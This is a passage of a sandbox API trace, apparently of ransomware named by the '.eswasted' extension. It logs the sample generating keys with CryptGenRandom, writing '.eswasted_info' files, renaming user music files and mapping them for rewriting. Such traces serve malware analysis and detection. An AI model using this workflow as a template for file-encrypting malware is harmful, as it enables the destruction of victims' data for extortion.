"c:\\users\\5p5nrgjn0js halpmcxz\\music\\8tazooyez86tt7.wav.eswasted")) returned 1 [0078.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8TaZOoYez86tt7.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8tazooyez86tt7.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.577] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0078.579] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.580] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.580] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.581] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.581] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.582] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.593] SetEndOfFile (hFile=0x108) returned 1 [0078.595] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.595] CloseHandle (hObject=0x108) returned 1 [0078.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0078.598] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.599] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.599] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.599] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWABTK.mp3") returned 50 [0078.599] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x26e) returned 0x71ec18 [0078.599] lstrcpyW (in: lpString1=0x71ec7c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.599] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.599] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.600] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.600] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWABTK.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lwabtk.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.601] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.602] SetEndOfFile (hFile=0x108) returned 1 [0078.602] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.602] lstrcpyW (in: lpString1=0x71ec7c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWABTK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lwabtk.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWABTK.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lwabtk.mp3.eswasted")) returned 1 [0078.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWABTK.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lwabtk.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0078.604] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0078.607] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.608] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.608] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.608] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.609] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.609] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.666] SetEndOfFile (hFile=0x108) returned 1 [0078.668] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.668] CloseHandle (hObject=0x108) returned 1 [0078.670] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0078.670] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.671] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.671] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrBW t5nfhfcvT.mp3") returned 58 [0078.671] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x6f5cc0 [0078.671] lstrcpyW (in: lpString1=0x6f5d34, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.671] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.672] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.672] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.672] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrBW t5nfhfcvT.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rrbw t5nfhfcvt.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.673] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.674] SetEndOfFile (hFile=0x108) returned 1 [0078.674] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.674] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.674] lstrcpyW (in: lpString1=0x6f5d34, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrBW t5nfhfcvT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rrbw t5nfhfcvt.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrBW t5nfhfcvT.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rrbw t5nfhfcvt.mp3.eswasted")) returned 1 [0078.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrBW t5nfhfcvT.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rrbw t5nfhfcvt.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.675] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0078.676] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.677] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.677] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.677] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.677] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.677] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.686] SetEndOfFile (hFile=0x108) returned 1 [0078.688] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.688] CloseHandle (hObject=0x108) returned 1 [0078.690] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.690] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.692] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.692] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.692] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrCDNylLtX8hV.mp3") returned 57 [0078.692] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x6f5cc0 [0078.692] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.692] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.692] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.693] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.693] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrCDNylLtX8hV.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rrcdnylltx8hv.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.694] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.695] SetEndOfFile (hFile=0x108) returned 1 [0078.695] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.695] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.695] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrCDNylLtX8hV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rrcdnylltx8hv.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrCDNylLtX8hV.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rrcdnylltx8hv.mp3.eswasted")) returned 1 [0078.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RrCDNylLtX8hV.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rrcdnylltx8hv.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.696] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0078.697] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.698] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.698] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.698] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.699] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.699] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.713] SetEndOfFile (hFile=0x108) returned 1 [0078.753] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.753] CloseHandle (hObject=0x108) returned 1 [0078.756] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.756] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.757] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.757] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Mjvb.mp3") returned 65 [0078.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28c) returned 0x1412c98 [0078.757] lstrcpyW (in: lpString1=0x1412d1a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.757] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.758] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.758] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Mjvb.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\2mjvb.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.759] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.760] SetEndOfFile (hFile=0x108) returned 1 [0078.760] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.760] lstrcpyW (in: lpString1=0x1412d1a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Mjvb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\2mjvb.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Mjvb.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\2mjvb.mp3.eswasted")) returned 1 [0078.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Mjvb.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\2mjvb.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.761] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0078.765] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.766] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.766] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.766] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.767] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.767] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.777] SetEndOfFile (hFile=0x108) returned 1 [0078.780] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.780] CloseHandle (hObject=0x108) returned 1 [0078.782] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c98 | out: hHeap=0x6d0000) returned 1 [0078.782] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.783] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.783] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.783] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\4XQqh6jJIGHGWT0nkTl.m4a") returned 79 [0078.783] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a8) returned 0x1412c98 [0078.783] lstrcpyW (in: lpString1=0x1412d36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.783] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.783] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.794] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.794] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\4XQqh6jJIGHGWT0nkTl.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\4xqqh6jjighgwt0nktl.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.795] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.796] SetEndOfFile (hFile=0x130) returned 1 [0078.796] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.796] lstrcpyW (in: lpString1=0x1412d36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\4XQqh6jJIGHGWT0nkTl.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\4xqqh6jjighgwt0nktl.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\4XQqh6jJIGHGWT0nkTl.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\4xqqh6jjighgwt0nktl.m4a.eswasted")) returned 1 [0078.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\4XQqh6jJIGHGWT0nkTl.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\4xqqh6jjighgwt0nktl.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.798] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0078.800] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.801] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.801] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.801] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.802] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.802] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.814] SetEndOfFile (hFile=0x130) returned 1 [0078.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.817] CloseHandle (hObject=0x130) returned 1 [0078.826] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c98 | out: hHeap=0x6d0000) returned 1 [0078.826] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.827] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.827] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.827] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\iSE8FEYkxF.wav") returned 70 [0078.827] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x296) returned 0x71ec18 [0078.827] lstrcpyW (in: lpString1=0x71eca4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.827] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.827] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.828] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.828] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\iSE8FEYkxF.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\ise8feykxf.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.829] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.830] SetEndOfFile (hFile=0x130) returned 1 [0078.830] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, 